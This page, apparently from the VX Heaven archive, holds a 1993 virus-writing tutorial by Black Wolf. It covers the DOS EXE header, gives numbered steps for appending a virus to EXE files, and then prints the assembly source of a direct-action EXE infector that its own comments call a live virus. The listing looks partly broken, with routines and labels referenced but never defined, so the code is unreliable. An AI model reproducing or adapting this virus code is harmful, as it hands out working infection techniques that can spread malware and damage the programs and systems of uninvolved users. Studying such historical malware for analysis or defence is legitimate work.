VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

EXE Viruses

Black Wolf

[Back to index] [Comments]

COM files are generally only written as quick utilities or as pieces of an operating system - especially today, they just aren't practical for large applications. Because of this, they provide a rather limited medium over which a virus can spread. EXE files, however, are more common in most DOS-based systems and offer viruses a better chance of survival. Infecting EXE files, however, is a little more complex than infecting COM's. Let us first take a look at exactly how an EXE is structured.

First off, unlike the COM files, EXE's are NOT a direct memory image of the program. At the start of their code in a file, they have what is called the EXE Header. This header is used to tell DOS things like where execution should start within the file (not necessarily at the beginning), where the stack should be, etc. After the header is what's called the Relocation Table. In most small .EXE files, this is empty. For any .EXE larger than 64k, and several below, this table plays a vital part in loading. The way it works is this: When DOS executes an EXE, it chooses the first free segment in memory. Then, like with COM's, it loads the PSP into that segment. Unlike COM's, with EXE files DOS adds 10h to CS, leaving ES and DS to point at the PSP segment. This means that the the program (excluding header) begins at CS:0000, where the PSP is set at [CS-10h]:0000. After the initial loading, it still must make use of the relocation table. The relocation table stores a list of pointers, each pointing to an address within the program. At each of these addresses is one of several absolute addressing commands that need to be adjusted for the segment that DOS initiates the program at. DOS goes through this table and adds the beginning segment of the program to each address.

For example, in a file there is the following command:

JMP 0000:0123

The file is loaded with the PSP at 10AB:0000 in memory, making the program start at 10BB:0000. After relocation by DOS, the command reads the following:

JMP 10BB:0123

An important thing to remember is that only the commands indicated in the relocation table will be changed in this method. This means you can just write a virus in one segment, avoiding any far calls within the code (except to static locations - DOS, for example). Some, however, do wish to use far calls and must modify the relocation table.

Now that we've looked at basically how DOS loads EXE files, let's take a closer look at the EXE header, as it is the most important part for viruses. The structure is as follows:

EXE Header Format

|00 EXE Signature | Usually 'MZ' but can be 'ZM' |
|02 Length of Last Page | In bytes |
|04 Size of File | In 512 byte pages, rounded up. |
|06 # of Rel. Tbl. Items| |
|08 Size of EXE Header | 16 byte paragraphs. |
|0A MINALLOC | Minimum memory allocated to file |
|0C MAXALLOC | Maximum memory allocated to file |
|0E Initial SS | Initial stack segment, relative to |
| | the beginning of the file. |
|10 Initial SP | Initial offset of stack pointer |
|12 Negative Checksum | Generally unused - Good place |
| | for ID bytes (overused though) |
|14 Initial IP | Initial execution offset |
|16 Initial CS | Initial execution segment, relative |
| | to start of program. |
|18 First Reloc. Item | Pointer to relocation table |
|1A Overlay Number | Overlay Marker |

To infect an .EXE file using the generic appending method, one must do the following:

  1. Make sure it is an .EXE file, not just misnamed, by checking the ID signature for 'MZ'.
  2. Store important registers from header that will be changed such as CS, IP, SS, and SP.
  3. Append the code to the end.
  4. Set CS:IP to point to viral code.
  5. Set SS:SP to be a viable location - make sure that you aren't going to push data over yourself or the host program! This is also a good place to set predictable values (in SP) for infection marking. (NOTE: TBSCAN and some others check for odd-numbered stacks when looking for viruses.)
  6. Recalculate the file size. Store as pages (rounding up) at offset 04 in header, then store the number of bytes in the last page at offset 02.
  7. If you are using far calls within code that need to be adjusted by the relocation table (NOT recommended) then the addresses should be added to the reloc. table at this point. BE SURE THAT THERE IS ENOUGH SPACE IN THE TABLE, OR ENLARGE THE TABLE! Also, adjust the "# of relocation table items" field appropriately. Notice that doing all this is a pain and generally not all that useful.
  8. Restore control to Host by resetting stack to original value, then setting CS:IP to point to old starting point. MAKE SURE TO SET ES AND DS TO POINT AT PSP. Also remember that the returning CS and SS must be adjusted by adding ES+10 to each.

Now that we have learned the basics, let's check out the next virus. It is also a direct-action infector, but this one infects only EXE files. Notice that the code is based on the direct-action COM file presented earlier.

; This file is a direct-action appending .EXE infector
;written in TASM - compatible assembler for the IBM PC.
;It is presented as a part of VIROLOGY 101 (c) 1993 Black Wolf.
;It is a live virus, and should NOT be released. Please execute
;the virus only on isolated machines under controlled conditions.

.model tiny
.radix 16 ;Default into Hexidecimal
org 100
push ds ;Save old offset

push cs cs ;Set ES = DS = CS
pop es ds ;for data accessing.

call get_offset ;This places the displace-
get_offset: ;ment of the virus from
pop bp ;its original compilation
sub bp,offset get_offset ;into BP.

Reset_Variables: ;Reset Old_XX values for
lea di,[Store_IP+bp] ;new infection.
lea si,[Old_IP+bp]

lea dx,[New_DTA+bp] ;Set DTA to the after
mov ah,1a ;virus
int 21

mov ah,4e
xor cx,cx ;Look only for normal
lea dx,[File_Mask+bp] ;Search for all files
;matching '*.COM'
int 21
jc No_More_Files

mov ax,3d02
lea dx,[New_DTA+1e+bp] ;offset 1eh in DTA =
int 21 ;Open file for read/write
xchg bx,ax ;Put File handle into BX

mov ah,3f
mov cx,1a
lea dx,[exe_header+bp] ;Read in EXE header.
int 21

cmp word ptr [exe_header+bp],'ZM' ;Standard EXE mark.
jne close_file ;Quit, misnamed
cmp byte ptr [exe_header+bp+12],'V' ;Check infection
je close_file ;mark in checksum
call Save_Old_Header

mov ax,4202 ;Go to the end of the file.
xor cx,cx ;This function returns
xor dx,dx ;file size into
int 21 ;DX:AX

push ax dx

call calculate_CSIP ;calculate starting

pop dx ax ;DX:AX = uninfected
;file size.

call calculate_size ;calculate file size for

mov ah,40 ;Write virus to the end
mov cx,end_virus-start ;of the file.
lea dx,[bp+start]
int 21

mov ax,4200 ;Return to the beginning
xor cx,cx ;of the file.
xor dx,dx
int 21

mov ah,40 ;Write header to the
mov cx,1a ;beginning of file.
lea dx,[bp+exe_header]
int 21

mov ah,3e
int 21
jmp No_More_Files ;Only infect one each time

Close_File: ;Close current file
mov ah,3e
int 21 ;Close file, then
;go to find another
Find_Next_File: ;file.
mov ah,4f
jmp Find_File

No_More_Files: ;Reset DTA to original location
pop ds ;Get PSP segment
mov dx,80
mov ah,1a
int 21

push ds ;Restore ES = DS = PSP
pop es

mov ax,es
add ax,10 ;add ajustment for PSP

add word ptr cs:[Store_CS+bp],ax ;Adjust old CS by
;current seg
add ax,word ptr cs:[bp+Store_SS] ;Adjust old SS
mov ss,ax ;Restore stack to
mov sp,word ptr cs:[bp+Store_SP] ;original position

db 0ea ;Simulate far jump to Store_CS:Store_IP
Store_IP dw 0
Store_CS dw 0
Store_SP dw 0
Store_SS dw 0

Old_IP dw 0
Old_CS dw 0fff0 ;Initially points to an
Old_SP dw 0 ;INT 20 in PSP for first
Old_SS dw 0fff0 ;run.

mov ax,word ptr [exe_header+bp+0e] ;Save old SS
mov word ptr [Old_SS+bp],ax
mov ax,word ptr [exe_header+bp+10] ;Save old SP
mov word ptr [Old_SP+bp],ax
mov ax,word ptr [exe_header+bp+14] ;Save old IP
mov word ptr [Old_IP+bp],ax
mov ax,word ptr [exe_header+bp+16] ;Save old CS
mov word ptr [Old_CS+bp],ax

push ax
mov ax,word ptr [exe_header+bp+8] ;Get header length
mov cl,4 ;and convert it to
shl ax,cl ;bytes.
mov cx,ax
pop ax

sub ax,cx ;Subtract header
sbb dx,0 ;size from file
;size for memory

mov cl,0c ;Convert DX into
shl dx,cl ;segment Address
mov cl,4
push ax ;Change offset (AX) into
shr ax,cl ;segment, except for last
add dx,ax ;digit. Add to DX and
shl ax,cl ;save DX as new CS, put
pop cx ;left over into CX and
sub cx,ax ;store as the new IP.
mov word ptr [exe_header+bp+14],cx
mov word ptr [exe_header+bp+16],dx ;Set new CS:IP
mov word ptr [exe_header+bp+0e],dx ;Set new SS = CS
mov word ptr [exe_header+bp+10],0fffe ;Set new SP
mov byte ptr [exe_header+bp+12],'V' ;mark infection

push ax ;Save offset for later

add ax,end_virus-start ;Add virus size to DX:AX
adc dx,0

mov cl,7
shl dx,cl ;convert DX to pages
mov cl,9
shr ax,cl
add ax,dx
inc ax
mov word ptr [exe_header+bp+04],ax ;save # of pages

pop ax ;Get offset
mov dx,ax
shr ax,cl ;Calc remainder
shl ax,cl ;in last page
sub dx,ax
mov word ptr [exe_header+bp+02],dx ;save remainder

File_Mask db '*.EXE',0 ;File mask used for search

exe_header db 1a dup (?)
end start
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka